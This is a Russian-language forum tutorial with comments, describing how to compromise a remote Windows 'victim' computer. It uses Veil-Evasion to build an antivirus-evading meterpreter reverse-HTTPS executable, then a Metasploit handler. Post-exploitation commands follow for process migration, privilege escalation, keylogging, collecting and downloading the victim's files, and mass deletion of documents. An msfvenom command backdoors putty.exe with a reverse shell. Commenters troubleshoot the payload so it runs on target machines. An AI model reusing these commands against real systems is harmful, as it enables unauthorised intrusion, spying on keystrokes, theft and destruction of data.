Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Следим за установкой, соглашаемся и все устанавливаем.

Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.

upload_2016-7-26_15-34-5.png


Далее вводим команду list – она покажет список доступных payload.

upload_2016-7-26_15-34-57.png


Нас интересует номер 32python/meterpreter/reverse_https

Вводим - use 32

upload_2016-7-26_15-35-15.png


Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP)

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Вводим имя создаваемого файла.

Выбираем вторую строку, жмем 2.

upload_2016-7-26_15-35-36.png


Ждем успешной генерации файла.

upload_2016-7-26_15-35-57.png


Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Выходим из Veil-Evasion.

Запускаем Metasploit.
#msfconsole

Далее
Код:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.

upload_2016-7-26_15-37-23.png


Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.

Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.

migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.

1. Кейлоггер
meterpreter > bgrun keylogrecorder

[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording

meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...

2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:

run file_collector -r -d e:\\ -f * -o /root/ file.txt


Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst


Скачиваем файлы на свой компьютер.

run file_collector -i /root /file.lst -l /root/

Полагаю не нужно обьяснять, что делают скрипты upload и download)

3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.

4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell

Удаление файлов exe:
del e:\*.* /f /s /q

удаление файлов doc:
del e:\*.doc /f /s /q


удаление файлов pdf:
del e:\*.pdf /f /s /q


5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.

За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.

Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
 
Последнее редактирование:
D

DoberGroup

Хочу заметить, что на данный момент Veil-Evasion не совсем корректно устанавливает зависимости на 32bit Debian (и Kali соответственно). Если у вас 32х-битка и ряд скриптов при генерации вываливается с ошибками пути - не удивляйтесь. Для мейнтейнеров Veil эта платформа не является приоритетной, для мейнтейнеров Kali нужно четко локализовать проблему (чем заниматься откровенно лень).
 
  • Нравится
Реакции: D8mbsniper и Vander
V

vikukoll

При тестировании данного способа всё получилось .Интересный и полный гайд
 
  • Нравится
Реакции: Vander

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Новичкам вообще рекомендую выучить данный гайд, всё написано развернуто и понятно,мы еще часто будем возвращаться к ему.Единственное хочу отметить что в десятке стало сложнее поднимать права.
 
  • Нравится
Реакции: Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Новичкам вообще рекомендую выучить данный гайд, всё написано развернуто и понятно,мы еще часто будем возвращаться к ему.Единственное хочу отметить что в десятке стало сложнее поднимать права.
Эта вещь еще актуальна - тыц
 

CodebyMan

К удалению 21.01.2019
11.12.2016
7
0
BIT
0
вопрос
IP локальный нужно указывать или внешний?
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
вопрос
IP локальный нужно указывать или внешний?
Если вы в локальной сети работаете, то LHOST - 192.168.XXX.XXX - адрес атакующего. Если за NAT, то пайлоад генерируете с LHOST - Ваш внешний IP, пробрасываете порт на роутере. И в multi/handler LHOST - ваш внутрений IP
 

thunder

Green Team
08.12.2016
219
26
BIT
0
@Vander Подскажи ,что за ***.. все сделал по твоей статье ..Сгенерировал вирусный файл в Veil , закинул на виртуальную машину (пробовал на windows 7 32bit, windows 10)..но вот беда ): при попытки открыть файл выдает ошибку msvcr100.dll . Как решить данную проблему ? Пробовал на обоих виндах ..устанавливать direx,visual c++ ,а так же пробовал в Veil выбирать 32.34
 

Вложения

  • Сним.PNG
    Сним.PNG
    108,7 КБ · Просмотры: 240
Последнее редактирование модератором:

thunder

Green Team
08.12.2016
219
26
BIT
0
Vander:Так же хотел добавить.Veil как то неправильно запускается ,с команды veil-evasion не стартует,а вот если ввести : cd Veil-Evasion, ls, ./ Veil-Evasion.py ..тогда начинает работать. Саму veil ,устанавливал так : cd Veil-Evasion/ls/cd setup /ls/./setup.sh, везде выбирал да/y , окна которые выскакивали с установкой программ..все устанавливал.
 

Вложения

  • 333333333.PNG
    333333333.PNG
    182,3 КБ · Просмотры: 476

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Vander:Так же хотел добавить.Veil как то неправильно запускается ,с команды veil-evasion не стартует,а вот если ввести : cd Veil-Evasion, ls, ./ Veil-Evasion.py ..тогда начинает работать. Саму veil ,устанавливал так : cd Veil-Evasion/ls/cd setup /ls/./setup.sh, везде выбирал да/y , окна которые выскакивали с установкой программ..все устанавливал.
Создайте alias для Veil, и все нормально будет. В сети полно инфы по alias, почитайте
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
@Vander Подскажи ,что за ***.. все сделал по твоей статье ..Сгенерировал вирусный файл в Veil , закинул на виртуальную машину (пробовал на windows 7 32bit, windows 10)..но вот беда ): при попытки открыть файл выдает ошибку msvcr100.dll . Как решить данную проблему ? Пробовал на обоих виндах ..устанавливать direx,visual c++ ,а так же пробовал в Veil выбирать 32.34
Microsoft Visual C++ 2010 - Этот ставили?
 
  • Нравится
Реакции: thunder

thunder

Green Team
08.12.2016
219
26
BIT
0
Vander: спасибо за подсказку (microsoft virsual c++2010). Тут же напрашивается вопрос.. установленный visual c++2010 на атакуемой машине ,это обязательно (то есть без visual c 2010 ,сгенерированый файл в veil попросту с не сможет открыться) ?

Vander:И потом :) почему такая странная зависимость генерируемых файлов в veil ,от пакета virsual c++2010 ? Пробовал ставит : virsual c++2015, virsual c++2013 ..файл ):не открывается ): выдавая туже ошибку. Как я понимаю, windows 8/10 поддерживает более новую версию virsual c++ . Вопрос ...как приручить veil (генерировать файлы , которые будут открываться при установленной virsual c++2015 на атакуемой машине ) ?
 
Последнее редактирование модератором:

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Как таковой, именно зависимости я не обнаружил, проверял на рандомных системах, (рабочих, не виртуальных) 7,8.1,10 всегда экзешники запускались.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!